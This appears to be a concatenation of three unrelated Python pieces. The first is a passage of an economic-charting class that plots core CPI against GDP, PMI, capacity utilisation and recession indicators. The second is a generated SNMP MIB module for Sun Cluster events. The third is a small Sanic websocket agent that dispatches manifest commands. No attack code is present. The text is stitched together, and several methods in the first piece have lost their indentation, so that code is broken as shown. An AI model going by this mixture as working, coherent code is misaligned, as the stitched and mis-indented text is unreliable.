self.xnyfed, self.ynyfed = xnyfed, ynyfed
ser_cpi = pd.Series(ycpi, index=xcpi)
ser_nyfed = pd.Series(ynyfed, index=xnyfed)
res_cpi = ser_cpi.resample('D').interpolate(method='linear')
res_nyfed = ser_nyfed.resample('D').interpolate(method='linear')
start_date = max([min(res_cpi.index),min(res_nyfed.index)])
end_date = min([max(res_cpi.index),max(res_nyfed.index)])
self.res_cpi = res_cpi.loc[start_date:end_date]
self.res_nyfed = res_nyfed.loc[start_date:end_date]
# self.res_cpi.plot()
self.cpi_nyfed_cor = np.corrcoef(self.res_cpi, self.res_nyfed)
def coreCPIvsGDP(self,cpi_start_date=datetime.date(1998, 1, 1)):
gdp_start_date = cpi_start_date - relativedelta.relativedelta(months=23)
gdp = {}
cpi = {}
for ss in range(self.GDP.shape[0]):
date = self.GDP[ss,0]
if not isinstance(date,datetime.date) or date.date() < gdp_start_date:
continue
lag_date = date + relativedelta.relativedelta(months=16)
gdp[lag_date] = self.GDP[self.GDP[:,0]==date,1][0]
for ss in range(self.CPI.shape[0]):
date = self.CPI[ss,0]
if not isinstance(date, datetime.date) or date.date() < cpi_start_date:
continue
cpi[date] = self.CPI[self.CPI[:,0]==date,1][0]
self.lcpi = sorted(cpi.items())
self.lgdp = sorted(gdp.items())
xcpi, ycpi = zip(*self.lcpi)
xgdp, ygdp = zip(*self.lgdp)
self.xcpi , self.ycpi = xcpi, ycpi
self.xgdp, self.ygdp = xgdp, ygdp
ser_cpi = pd.Series(ycpi, index=xcpi)
ser_gdp = pd.Series(ygdp, index=xgdp)
res_cpi = ser_cpi.resample('D').interpolate(method='linear')
res_gdp = ser_gdp.resample('D').interpolate(method='linear')
start_date = max([min(res_cpi.index),min(res_gdp.index)])
end_date = min([max(res_cpi.index),max(res_gdp.index)])
self.res_cpi = res_cpi.loc[start_date:end_date]
self.res_gdp = res_gdp.loc[start_date:end_date]
# self.res_cpi.plot()
self.cpi_gdp_cor = np.corrcoef(self.res_cpi, self.res_gdp)
#%% Plot
    def plotCPIvsGDP(self, cpi_start_date=datetime.date(1998, 1, 1)):
        """Plot core CPI (right axis) against real GDP YoY (left axis).

        Recomputes the aligned series via coreCPIvsGDP, shades the 2001 and
        2007 recessions, and titles the chart with the computed correlation.

        :param datetime.date cpi_start_date: forwarded to coreCPIvsGDP.
        :return: the matplotlib Figure.
        """
        self.coreCPIvsGDP(cpi_start_date=cpi_start_date)
        fig = plt.figure(figsize=(15,7))
        ax = fig.add_subplot(111)
        xcpi, ycpi = zip(*self.lcpi)
        xgdp, ygdp = zip(*self.lgdp)
        gdp_curve, = ax.plot(xgdp,ygdp,lw=3,color='r',alpha=1, label='Real GDP (YoY)')
        # Second y-axis so CPI and GDP keep independent scales.
        ax2 = ax.twinx()
        cpi_curve, = ax2.plot(xcpi,ycpi,lw=3,color='b',alpha=0.9,label='CPI (YoY)')
        ax.tick_params(labelsize=20)
        ax2.tick_params(labelsize=20)
        # Colour each axis' ticks to match its curve.
        ax.tick_params(axis='y', colors=gdp_curve.get_color())
        ax2.tick_params(axis='y', colors=cpi_curve.get_color())
        ybounds = ax.get_ybound()
        # Recessions is a module-level {year: (start, end)} map used for shading.
        ax.fill_betweenx(ybounds,Recessions[2001][0], Recessions[2001][1] ,color='r',alpha=0.3)
        shade = ax.fill_betweenx(ybounds,Recessions[2007][0], Recessions[2007][1] ,color='r',alpha=0.3,label='recession')
        lines = [gdp_curve, cpi_curve, shade]
        ax.legend(lines, [l.get_label() for l in lines], loc='lower right', fontsize=25)
        ax.set_title('Core CPI and Real GDP (16mo Lead): Corr = {}'.format(round(self.cpi_gdp_cor[0,1],3)),fontsize=25)
        return fig
#%% Plot
    def plotCPIvsNYFED(self):
        """Plot core CPI (right axis) against the lagged NY Fed inflation gauge (left axis).

        Recomputes the aligned series via coreCPIvsNYFED, shades the 2001 and
        2007 recessions, and titles the chart with the computed correlation.

        :return: the matplotlib Figure.
        """
        self.coreCPIvsNYFED()
        xcpi, ycpi = zip(*self.lcpi)
        xnyfed, ynyfed = zip(*self.lnyfed)
        fig = plt.figure(figsize=(15,7))
        ax = fig.add_subplot(111)
        nyfed_curve, = ax.plot(xnyfed,ynyfed,lw=3,color='r',alpha=1, label='NY Fed Inflation')
        # Second y-axis so the two series keep independent scales.
        ax2 = ax.twinx()
        cpi_curve, = ax2.plot(xcpi,ycpi,lw=3,color='b',alpha=0.9,label='CPI (YoY)')
        ax.tick_params(labelsize=20)
        ax2.tick_params(labelsize=20)
        # Colour each axis' ticks to match its curve.
        ax.tick_params(axis='y', colors=nyfed_curve.get_color())
        ax2.tick_params(axis='y', colors=cpi_curve.get_color())
        ybounds = ax.get_ybound()
        ax.fill_betweenx(ybounds,Recessions[2001][0], Recessions[2001][1] ,color='r',alpha=0.3)
        shade = ax.fill_betweenx(ybounds,Recessions[2007][0], Recessions[2007][1] ,color='r',alpha=0.3,label='recession')
        lines = [nyfed_curve, cpi_curve, shade]
        ax.legend(lines, [l.get_label() for l in lines], loc='lower right', fontsize=25)
        ax.set_title('Core CPI and NY Fed Inflation (16mo Lead): Corr = {}'.format(round(self.cpi_nyfed_cor[0,1],3)),fontsize=25)
        return fig
#%% Plot confidence scores
    def plotConfidenceScores(self):
        """Plot z-scored confidence indices (consumer, CEO, home builders,
        small business, and their average) with 2007 recession shading.

        Relies on confidenceScores() to populate self.zcc, self.zceoc,
        self.zhbc, self.zsbo and self.zmeanconf ({date: z-score} maps).

        :return: the matplotlib Figure.
        """
        self.confidenceScores()
        fig = plt.figure(figsize=(15,7))
        ax = fig.add_subplot(111)
        # Sort each {date: z} map into chronological (date, z) pairs.
        lhbc = sorted(self.zhbc.items())
        lceoc = sorted(self.zceoc.items())
        lsbo = sorted(self.zsbo.items())
        lcc= sorted(self.zcc.items())
        lmean = sorted(self.zmeanconf.items())
        xcc,ycc = zip(*lcc)
        xhbc,yhbc = zip(*lhbc)
        xceoc, yceoc = zip(*lceoc)
        xsbo, ysbo = zip(*lsbo)
        xmean, ymean = zip(*lmean)
        # NOTE: plot order must match the legend label order below.
        ax.plot(xcc,ycc,lw=3,color='blue')
        ax.plot(xceoc, yceoc,color='red',lw=3)
        ax.plot(xhbc, yhbc, color='orange',lw=3)
        ax.plot(xsbo, ysbo, color='green',lw=3)
        ax.plot(xmean, ymean, color='black',lw=3)
        ax.grid(axis='y')
        ax.set_ylabel('z-score',fontsize=20)
        ax.set_ylim(-4,3)
        ax.tick_params(labelsize=20)
        recession = Recessions[2007]
        # Shade spans the fixed y-limits set above.
        ax.fill_betweenx([-4,3], recession[0], recession[1], color='gray',alpha=0.5)
        ax.legend(['Consumer Conf','CEO Conf','Home Builders Conf','Small Busi Opt.', 'Average','Recession'],fontsize=18)
        plt.gca().xaxis.set_major_formatter(mdates.DateFormatter('%m-%Y'))
        plt.gcf().autofmt_xdate()
        return fig
#%%
    def plotDummyCPIvCapacityUtil(self):
        """Plot daily-resampled capacity utilization vs. core CPI (dual axes).

        Uses the interpolated series (self.res_cu / self.res_cpi) produced by
        coreCPIvCapacityUtil rather than the raw observations.

        NOTE(review): this method reads self.Recessions while sibling plotters
        use a module-level Recessions -- confirm which is intended.

        :return: the matplotlib Figure.
        """
        self.coreCPIvCapacityUtil()
        fig = plt.figure(figsize=(15,7))
        ax = fig.add_subplot(111)
        # print(self.cpi_caputil_corr)
        cu_curve, = ax.plot(self.res_cu.index, self.res_cu.values,lw=3,color='r',alpha=1, label='Capacity Util.')
        ax2 = ax.twinx()
        cpi_curve, = ax2.plot(self.res_cpi.index, self.res_cpi.values,lw=3,color='b',alpha=0.9,label='CPI (YoY)')
        ax.tick_params(labelsize=20)
        ax2.tick_params(labelsize=20)
        ax.tick_params(axis='y', colors=cu_curve.get_color())
        ax2.tick_params(axis='y', colors=cpi_curve.get_color())
        ybounds = ax.get_ybound()
        ax.fill_betweenx(ybounds, self.Recessions[2001][0], self.Recessions[2001][1],
                         color='r',alpha=0.3)
        shade = ax.fill_betweenx(ybounds, self.Recessions[2007][0], self.Recessions[2007][1],
                                 color='r',alpha=0.3,label='recession')
        lines = [cu_curve, cpi_curve, shade]
        ax.legend(lines, [l.get_label() for l in lines], loc='lower right', fontsize=25)
        ax.set_title('Core CPI and Capacity Utilization: Corr = {}'.format(round(self.cpi_caputil_cor[0,1],3)),fontsize=25)
        return fig
#%%
    def plotCPIvCapacityUtil(self):
        """Plot raw capacity utilization vs. core CPI observations (dual axes).

        Uses the unresampled point series (self.xcu/self.ycu and
        self.xcpi/self.ycpi) populated by coreCPIvCapacityUtil.

        :return: the matplotlib Figure.
        """
        self.coreCPIvCapacityUtil()
        fig = plt.figure(figsize=(15,7))
        ax = fig.add_subplot(111)
        # print(self.cpi_caputil_corr)
        cu_curve, = ax.plot(self.xcu, self.ycu,lw=3,color='r',alpha=1, label='Capacity Util.')
        ax2 = ax.twinx()
        cpi_curve, = ax2.plot(self.xcpi, self.ycpi,lw=3,color='b',alpha=0.9,label='CPI (YoY)')
        ax.tick_params(labelsize=20)
        ax2.tick_params(labelsize=20)
        ax.tick_params(axis='y', colors=cu_curve.get_color())
        ax2.tick_params(axis='y', colors=cpi_curve.get_color())
        ybounds = ax.get_ybound()
        ax.fill_betweenx(ybounds, self.Recessions[2001][0], self.Recessions[2001][1],
                         color='r',alpha=0.3)
        shade = ax.fill_betweenx(ybounds, self.Recessions[2007][0], self.Recessions[2007][1],
                                 color='r',alpha=0.3,label='recession')
        lines = [cu_curve, cpi_curve, shade]
        ax.legend(lines, [l.get_label() for l in lines], loc='lower right', fontsize=25)
        ax.set_title('Core CPI and Capacity Utilization (16mo Lead): Corr = {}'.format(round(self.cpi_caputil_cor[0,1],3)),fontsize=25)
        return fig
#%% Plot
    def plotCPIvsPMI(self):
        """Plot core CPI (right axis) against ISM PMI (left axis).

        Recomputes the aligned series via coreCPIvsISMPMI, shades the 2001
        and 2007 recessions, and titles the chart with the correlation.

        :return: the matplotlib Figure.
        """
        self.coreCPIvsISMPMI()
        lcpi = sorted(self.cpi.items())
        lpmi = sorted(self.pmi.items())
        xcpi, ycpi = zip(*lcpi)
        xpmi, ypmi = zip(*lpmi)
        fig = plt.figure(figsize=(15,7))
        ax = fig.add_subplot(111)
        pmi_curve, = ax.plot(xpmi,ypmi,lw=3,color='r',alpha=1, label='ISM PMI')
        # Second y-axis so CPI and PMI keep independent scales.
        ax2 = ax.twinx()
        cpi_curve, = ax2.plot(xcpi,ycpi,lw=3,color='b',alpha=0.9,label='CPI (YoY)')
        ax.tick_params(labelsize=20)
        ax2.tick_params(labelsize=20)
        ax.tick_params(axis='y', colors=pmi_curve.get_color())
        ax2.tick_params(axis='y', colors=cpi_curve.get_color())
        ybounds = ax.get_ybound()
        ax.fill_betweenx(ybounds,Recessions[2001][0], Recessions[2001][1] ,color='r',alpha=0.3)
        shade = ax.fill_betweenx(ybounds,Recessions[2007][0], Recessions[2007][1] ,color='r',alpha=0.3,label='recession')
        lines = [pmi_curve, cpi_curve, shade]
        ax.legend(lines, [l.get_label() for l in lines], loc='lower right', fontsize=25)
        ax.set_title('Core CPI and ISM PMI (23mo Lead): Corr = {}'.format(round(self.cpi_pmi_cor[0,1],3)),fontsize=25)
        return fig
def plotDummyCPIvsPMI(self):
self.coreCPIvsISMPMI()
lcpi = sorted(self.cpi.items())
lpmi = sorted(self.pmi.items())
xcpi, ycpi = zip(*lcpi)
xpmi, ypmi = zip(*lpmi)
fig = plt.figure(figsize=(15,7))
ax = fig.add_subplot(111)
ax.scatter(self.res_cpi.values, self.res_pmi.values,s=10)
# pmi_curve, = ax.plot(self.res_pmi.index, self.res_pmi.values,lw=3,color='r',alpha=1, label='ISM PMI')
#
# ax2 = ax.twinx()
# cpi_curve, = ax2.plot(self.res_cpi.index,self.res_cpi.values,lw=3,color='b',alpha=0.9,label='CPI (YoY)')
#
# ax.tick_params(labelsize=20)
# ax2.tick_params(labelsize=20)
#
# ax.tick_params(axis='y', colors=pmi_curve.get_color())
# ax2.tick_params(axis='y', colors=cpi_curve.get_color())
#
# ybounds = ax.get_ybound()
#
# ax.fill_betweenx(ybounds,Recessions[2001][0], Recessions[2001][1] ,color='r',alpha=0.3)
# shade = ax.fill_betweenx(ybounds,Recessions[2007][0], Recessions[2007][1] ,color='r',alpha=0.3,label='recession')
#
# lines = [pmi_curve, cpi_curve, shade]
# ax.legend(lines, [l.get_label() for l in lines], loc='lower right', fontsize=25)
# ax.set_title('Core CPI and ISM PMI: Corr = {}'.format(round(self.cpi_pmi_cor[0,1],3)),fontsize=25)
#
return fig
#%% Plots
def plotHighYeild(self):
#dates=[datetime.date(int(el.split('/')[2]), int(el.split('/')[0]), int(el.split('/')[1])) for el in self.HYS[2:,0] if ((not isinstance(el, float)) and ('/' in el) and (len(el)<15) )]
entry = self.HYS[4,0]
if isinstance(entry, datetime.date):
end_date=entry
else:
try:
end_date=datetime.datetime.strptime(entry,'%m/%d/%Y').date()
except TypeError:
print("Cannot parse '{}' as date. Check entry 5 of 'HY Spreads'. See 'plotHighYield' method in 'ChartAppPlots.py' to change end_date'".format(entry))
#print("End date: {}".format(end_date))
self.HighYeildSpread(scope=600, data_end_date=end_date)
fig = plt.figure(figsize=(15,7))
ax = fig.add_subplot(111)
#%%
l2001 = sorted(self.recession_2001.items())
l2007 = sorted(self.recession_2007.items())
l6mo = sorted(self.six_mos_to_recession.items())
l1yr = sorted(self.one_year_to_recession.items())
x2001, y2001 = zip(*l2001)
x2007, y2007 = zip(*l2007)
x6mo, y6mo = zip(*l6mo)
x1yr, y1yr = zip(*l1yr)
ax.plot(x2001, y2001,lw=3,color='b',alpha=0.9)
ax.plot(x2007, y2007,lw=3,color='yellow',alpha=0.9)
ax.plot(x6mo, y6mo,lw=3,color='k',alpha=0.9)
ax.plot(x6mo[:len(x1yr)], y1yr,lw=3,color='g',alpha=0.9)
ax.grid(axis='y')
ybounds = ax.get_ybound()
ax.fill_betweenx(ybounds, 1,self.HYscope, alpha=0.5)
xticks = range(-self.HYscope,self.HYscope,40)
ax.set_xticks(xticks)
ax.set_xticklabels(xticks)
ax.set_yticklabels([0,5,10,15,20])
#ax.set_ylabel('YoY (%)',fontsize=20)
ax.set_xlabel('Trading Days to Recession',fontsize=20)
ax.tick_params(labelsize=20)
ax.legend(['2001', '2007', 'Now (6mo to Recession)', 'Now (1yr to Recession)', 'Recession'],fontsize=25)
ax.set_xlim(-self.HYscope-2, self.HYscope+5)
plt.xticks(rotation='vertical')
return fig
#%%
    def plotLEI(self):
        """Plot the current LEI trajectory against the historical 25th/75th
        percentile band in the 24 months around recession starts.

        :return: the matplotlib Figure.
        """
        self.leadingEconomicIndicators(24)
        fig = plt.figure(figsize=(15,7))
        ax = fig.add_subplot(111)
        xmean,ymean = zip(*self.leimean)
        x25, y25 = zip(*self.lei25)
        x75, y75 = zip(*self.lei75)
        # NOTE(review): 'mons' and 'ymean' are unpacked but never used below.
        mons, vals = zip(*self.leicurr)
        # Current series is shorter; align it to the leading percentile x-axis.
        months_to_ = x25[:len(vals)]
        ax.grid(axis='y')
        # Interquartile band across historical recessions.
        ax.fill_between(x25, y25, y75, alpha=0.5,linewidth=1,linestyle='dashed',edgecolor='r')
        ax.plot(months_to_,vals,lw=3,color='b',alpha=0.9)
        xticks = [-24,-20,-16,-12,-8,-4,0,4,8,12,16,20,24]
        ax.set_xticks(xticks)
        ax.set_xticklabels(xticks)
        ax.set_ylabel('LEI YoY (%)',fontsize=20)
        ax.set_xlabel('Months Leading up to Recession',fontsize=20)
        ax.tick_params(labelsize=20)
        ybounds = ax.get_ybound()
        xbounds = ax.get_xbound()
        ax.legend(['Current (1yr to Rec.)', '25th/75th %le'], fontsize=25, loc='lower left')
        ax.set_xlim(xmean[0]-.5, xmean[-1]+.5)
        # Vertical dashed line marks the recession start (month 0).
        ax.vlines(0, ybounds[0], ybounds[1], linestyle='dashed',lw=3)
        ax.hlines(0, xmean[0], xbounds[1], lw=3,color='gray')
        return fig
#%% Plots
    def plotPMItoRecession(self):
        """Plot the current PMI trajectory against the historical 25th/75th
        percentile band in the 24 months around recession starts.

        :return: the matplotlib Figure.
        """
        self.pmiLeadingToRecession(24)
        fig = plt.figure(figsize=(15,7))
        ax = fig.add_subplot(111)
        # NOTE(review): 'ymean' is unpacked but never plotted below.
        xmean,ymean = zip(*self.pmimean)
        x25, y25 = zip(*self.pmi25)
        x75, y75 = zip(*self.pmi75)
        months_to, vals = zip(*self.pmicurr)
        ax.plot(months_to,vals,lw=3,color='k',alpha=0.9)
        ax.grid(axis='y')
        # Interquartile band across historical recessions.
        ax.fill_between(x25, y25, y75, alpha=0.5,linewidth=1,linestyle='dashed',edgecolor='r')
        xticks = [-24,-20,-16,-12,-8,-4,0,4,8,12,16,20,24]
        ax.set_xticks(xticks)
        ax.set_xticklabels(xticks)
        ax.set_ylabel('PMI YoY (%)',fontsize=20)
        ax.set_xlabel('Months Leading up to Recession',fontsize=20)
        ax.tick_params(labelsize=20)
        ybounds = ax.get_ybound()
        ax.legend(['Current (1yr to Rec.)', '25th/75th %le'], fontsize=25,loc='lower left')
        ax.set_xlim(xmean[0]-.5, xmean[-1]+.5)
        # Vertical dashed line marks the recession start (month 0).
        ax.vlines(0, ybounds[0], ybounds[1], linestyle='dashed',lw=3)
        return fig
|
#
# PySNMP MIB module SUN-CLUSTER-EVENTS-MIB (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/SUN-CLUSTER-EVENTS-MIB
# Produced by pysmi-0.3.4 at Mon Apr 29 21:04:15 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
# Machine-generated pysmi output for SUN-CLUSTER-EVENTS-MIB.
# Do not hand-edit the OID tuples below; regenerate from the ASN.1 source.
OctetString, ObjectIdentifier, Integer = mibBuilder.importSymbols("ASN1", "OctetString", "ObjectIdentifier", "Integer")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
ValueSizeConstraint, ConstraintsIntersection, ConstraintsUnion, SingleValueConstraint, ValueRangeConstraint = mibBuilder.importSymbols("ASN1-REFINEMENT", "ValueSizeConstraint", "ConstraintsIntersection", "ConstraintsUnion", "SingleValueConstraint", "ValueRangeConstraint")
ModuleCompliance, NotificationGroup = mibBuilder.importSymbols("SNMPv2-CONF", "ModuleCompliance", "NotificationGroup")
Unsigned32, Bits, Integer32, iso, ObjectIdentity, IpAddress, Counter32, TimeTicks, MibIdentifier, Gauge32, NotificationType, ModuleIdentity, Counter64, MibScalar, MibTable, MibTableRow, MibTableColumn = mibBuilder.importSymbols("SNMPv2-SMI", "Unsigned32", "Bits", "Integer32", "iso", "ObjectIdentity", "IpAddress", "Counter32", "TimeTicks", "MibIdentifier", "Gauge32", "NotificationType", "ModuleIdentity", "Counter64", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn")
TextualConvention, DisplayString = mibBuilder.importSymbols("SNMPv2-TC", "TextualConvention", "DisplayString")
# Module identity: enterprises.sun(42).prod(2).suncluster(80).2
sunClusterEventsMIB = ModuleIdentity((1, 3, 6, 1, 4, 1, 42, 2, 80, 2))
# NOTE(review): '1902-11-30' is presumably a pysmi two-digit-year artifact of
# the 2002-11-30 revision encoded in setLastUpdated below -- confirm.
sunClusterEventsMIB.setRevisions(('1902-11-30 00:00',))
if mibBuilder.loadTexts: sunClusterEventsMIB.setLastUpdated('0211300000Z')
if mibBuilder.loadTexts: sunClusterEventsMIB.setOrganization('Sun Microsystems')
# OID subtree anchors.
sun = MibIdentifier((1, 3, 6, 1, 4, 1, 42))
prod = MibIdentifier((1, 3, 6, 1, 4, 1, 42, 2))
suncluster = MibIdentifier((1, 3, 6, 1, 4, 1, 42, 2, 80))
scEventsMIBObjects = MibIdentifier((1, 3, 6, 1, 4, 1, 42, 2, 80, 2, 1))
scEventsMIBNotifications = MibIdentifier((1, 3, 6, 1, 4, 1, 42, 2, 80, 2, 2))
# Textual conventions (typed wrappers over the base SMI types).
class ScEventTableCount(TextualConvention, Integer32):
    status = 'current'
    subtypeSpec = Integer32.subtypeSpec + ValueRangeConstraint(20, 32767)
class ScEventIndex(TextualConvention, Integer32):
    status = 'current'
class ScClusterId(DisplayString):
    status = 'current'
class ScClusterName(DisplayString):
    status = 'current'
class ScNodeName(DisplayString):
    status = 'current'
class ScEventVersion(TextualConvention, Integer32):
    status = 'current'
class ScEventClassName(DisplayString):
    status = 'current'
class ScEventSubclassName(DisplayString):
    status = 'current'
class ScEventSeverity(TextualConvention, Integer32):
    status = 'current'
    subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(0, 1, 2, 3, 4))
    namedValues = NamedValues(("clEventSevInfo", 0), ("clEventSevWarning", 1), ("clEventSevError", 2), ("clEventSevCritical", 3), ("clEventSevFatal", 4))
class ScEventInitiator(TextualConvention, Integer32):
    status = 'current'
    subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(0, 1, 2, 3))
    namedValues = NamedValues(("clEventInitUnknown", 0), ("clEventInitSystem", 1), ("clEventInitOperator", 2), ("clEventInitAgent", 3))
class ScEventPublisher(DisplayString):
    status = 'current'
class ScEventPid(TextualConvention, Counter64):
    status = 'current'
class ScTimeStamp(TextualConvention, Counter64):
    status = 'current'
class ScEventData(DisplayString):
    status = 'current'
class ScEventAttributeName(DisplayString):
    status = 'current'
class ScEventAttributeValue(DisplayString):
    status = 'current'
# Scalar and table objects under scEventsMIBObjects.
escEventTableCount = MibScalar((1, 3, 6, 1, 4, 1, 42, 2, 80, 2, 1, 1), ScEventTableCount()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: escEventTableCount.setStatus('current')
escEventsTable = MibTable((1, 3, 6, 1, 4, 1, 42, 2, 80, 2, 1, 2), )
if mibBuilder.loadTexts: escEventsTable.setStatus('current')
escEventsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 42, 2, 80, 2, 1, 2, 1), ).setIndexNames((0, "SUN-CLUSTER-EVENTS-MIB", "eventIndex"))
if mibBuilder.loadTexts: escEventsEntry.setStatus('current')
eventIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 42, 2, 80, 2, 1, 2, 1, 1), ScEventIndex()).setMaxAccess("readonly")
if mibBuilder.loadTexts: eventIndex.setStatus('current')
eventClusterId = MibTableColumn((1, 3, 6, 1, 4, 1, 42, 2, 80, 2, 1, 2, 1, 2), ScClusterId()).setMaxAccess("readonly")
if mibBuilder.loadTexts: eventClusterId.setStatus('current')
eventClusterName = MibTableColumn((1, 3, 6, 1, 4, 1, 42, 2, 80, 2, 1, 2, 1, 3), ScClusterName()).setMaxAccess("readonly")
if mibBuilder.loadTexts: eventClusterName.setStatus('current')
eventNodeName = MibTableColumn((1, 3, 6, 1, 4, 1, 42, 2, 80, 2, 1, 2, 1, 4), ScNodeName()).setMaxAccess("readonly")
if mibBuilder.loadTexts: eventNodeName.setStatus('current')
eventVersion = MibTableColumn((1, 3, 6, 1, 4, 1, 42, 2, 80, 2, 1, 2, 1, 5), ScEventVersion()).setMaxAccess("readonly")
if mibBuilder.loadTexts: eventVersion.setStatus('current')
eventClassName = MibTableColumn((1, 3, 6, 1, 4, 1, 42, 2, 80, 2, 1, 2, 1, 6), ScEventClassName()).setMaxAccess("readonly")
if mibBuilder.loadTexts: eventClassName.setStatus('current')
eventSubclassName = MibTableColumn((1, 3, 6, 1, 4, 1, 42, 2, 80, 2, 1, 2, 1, 7), ScEventSubclassName()).setMaxAccess("readonly")
if mibBuilder.loadTexts: eventSubclassName.setStatus('current')
eventSeverity = MibTableColumn((1, 3, 6, 1, 4, 1, 42, 2, 80, 2, 1, 2, 1, 8), ScEventSeverity()).setMaxAccess("readonly")
if mibBuilder.loadTexts: eventSeverity.setStatus('current')
eventInitiator = MibTableColumn((1, 3, 6, 1, 4, 1, 42, 2, 80, 2, 1, 2, 1, 9), ScEventInitiator()).setMaxAccess("readonly")
if mibBuilder.loadTexts: eventInitiator.setStatus('current')
eventPublisher = MibTableColumn((1, 3, 6, 1, 4, 1, 42, 2, 80, 2, 1, 2, 1, 10), ScEventPublisher()).setMaxAccess("readonly")
if mibBuilder.loadTexts: eventPublisher.setStatus('current')
eventSeqNo = MibTableColumn((1, 3, 6, 1, 4, 1, 42, 2, 80, 2, 1, 2, 1, 11), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: eventSeqNo.setStatus('current')
eventPid = MibTableColumn((1, 3, 6, 1, 4, 1, 42, 2, 80, 2, 1, 2, 1, 12), ScEventPid()).setMaxAccess("readonly")
if mibBuilder.loadTexts: eventPid.setStatus('current')
eventTimeStamp = MibTableColumn((1, 3, 6, 1, 4, 1, 42, 2, 80, 2, 1, 2, 1, 13), ScTimeStamp()).setMaxAccess("readonly")
if mibBuilder.loadTexts: eventTimeStamp.setStatus('current')
eventData = MibTableColumn((1, 3, 6, 1, 4, 1, 42, 2, 80, 2, 1, 2, 1, 14), ScEventData()).setMaxAccess("readonly")
if mibBuilder.loadTexts: eventData.setStatus('current')
# Per-event attribute table, indexed by (eventIndex, attributeName).
escEventsAttributesTable = MibTable((1, 3, 6, 1, 4, 1, 42, 2, 80, 2, 1, 3), )
if mibBuilder.loadTexts: escEventsAttributesTable.setStatus('current')
escEventsAttributesEntry = MibTableRow((1, 3, 6, 1, 4, 1, 42, 2, 80, 2, 1, 3, 1), ).setIndexNames((0, "SUN-CLUSTER-EVENTS-MIB", "eventIndex"), (0, "SUN-CLUSTER-EVENTS-MIB", "attributeName"))
if mibBuilder.loadTexts: escEventsAttributesEntry.setStatus('current')
attributeName = MibTableColumn((1, 3, 6, 1, 4, 1, 42, 2, 80, 2, 1, 3, 1, 1), ScEventAttributeName())
if mibBuilder.loadTexts: attributeName.setStatus('current')
attributeValue = MibTableColumn((1, 3, 6, 1, 4, 1, 42, 2, 80, 2, 1, 3, 1, 2), ScEventAttributeValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: attributeValue.setStatus('current')
# Trap definition carrying the full event row.
escNewEvents = NotificationType((1, 3, 6, 1, 4, 1, 42, 2, 80, 2, 2, 1)).setObjects(("SUN-CLUSTER-EVENTS-MIB", "eventIndex"), ("SUN-CLUSTER-EVENTS-MIB", "eventClusterId"), ("SUN-CLUSTER-EVENTS-MIB", "eventClusterName"), ("SUN-CLUSTER-EVENTS-MIB", "eventNodeName"), ("SUN-CLUSTER-EVENTS-MIB", "eventVersion"), ("SUN-CLUSTER-EVENTS-MIB", "eventClassName"), ("SUN-CLUSTER-EVENTS-MIB", "eventSubclassName"), ("SUN-CLUSTER-EVENTS-MIB", "eventSeverity"), ("SUN-CLUSTER-EVENTS-MIB", "eventInitiator"), ("SUN-CLUSTER-EVENTS-MIB", "eventPublisher"), ("SUN-CLUSTER-EVENTS-MIB", "eventSeqNo"), ("SUN-CLUSTER-EVENTS-MIB", "eventPid"), ("SUN-CLUSTER-EVENTS-MIB", "eventTimeStamp"), ("SUN-CLUSTER-EVENTS-MIB", "eventData"))
if mibBuilder.loadTexts: escNewEvents.setStatus('current')
mibBuilder.exportSymbols("SUN-CLUSTER-EVENTS-MIB", ScEventData=ScEventData, ScEventSubclassName=ScEventSubclassName, eventClusterName=eventClusterName, escEventsAttributesTable=escEventsAttributesTable, eventClusterId=eventClusterId, eventInitiator=eventInitiator, prod=prod, escEventTableCount=escEventTableCount, escEventsAttributesEntry=escEventsAttributesEntry, eventPublisher=eventPublisher, escEventsTable=escEventsTable, ScEventIndex=ScEventIndex, ScEventAttributeValue=ScEventAttributeValue, scEventsMIBObjects=scEventsMIBObjects, eventNodeName=eventNodeName, ScEventAttributeName=ScEventAttributeName, attributeName=attributeName, escEventsEntry=escEventsEntry, eventSeqNo=eventSeqNo, ScTimeStamp=ScTimeStamp, attributeValue=attributeValue, eventVersion=eventVersion, eventSubclassName=eventSubclassName, ScEventInitiator=ScEventInitiator, ScEventClassName=ScEventClassName, escNewEvents=escNewEvents, PYSNMP_MODULE_ID=sunClusterEventsMIB, scEventsMIBNotifications=scEventsMIBNotifications, ScNodeName=ScNodeName, eventTimeStamp=eventTimeStamp, ScEventSeverity=ScEventSeverity, eventIndex=eventIndex, ScEventPublisher=ScEventPublisher, eventSeverity=eventSeverity, eventData=eventData, eventPid=eventPid, suncluster=suncluster, ScEventPid=ScEventPid, sunClusterEventsMIB=sunClusterEventsMIB, ScClusterId=ScClusterId, sun=sun, ScEventTableCount=ScEventTableCount, ScClusterName=ScClusterName, eventClassName=eventClassName, ScEventVersion=ScEventVersion)
|
import json
import asyncio
import threading
from sanic import Sanic, response
from sanic.websocket import WebSocketProtocol
from hhagent.meta import BANNER
from hhagent.tools import manifest
# Module-level Sanic application instance; served by start_server().
app = Sanic(name='hhagent')
async def _consumer_handler(ws):
    """Receive command messages from the websocket and dispatch them.

    Each message is expected to be a JSON object with a 'command' key naming
    an entry in hhagent.tools.manifest; the matching callable is launched on
    a daemon thread so the receive loop is never blocked.

    Robustness fix: malformed JSON or a payload without 'command' is now
    skipped instead of raising and tearing down the websocket handler.
    """
    while True:
        data = await ws.recv()
        try:
            json_data = json.loads(data)
            command = json_data['command']
        except (ValueError, KeyError, TypeError):
            # Bad payload: ignore it rather than killing the connection.
            continue
        target_func = None
        if command in manifest:
            target_func = manifest[command]
        if target_func:
            # TODO: forward json_data['args'] once the arg protocol is fixed.
            t = threading.Thread(target=target_func)
            t.daemon = True
            t.start()
async def _producer_handler(ws):
    """Outbound half of the websocket loop.

    Placeholder: emits a single 'hello', then idles one second before
    hhagent_connect restarts the round.
    """
    # TODO: send real agent data back to the websocket
    await ws.send('hello')
    await asyncio.sleep(1)
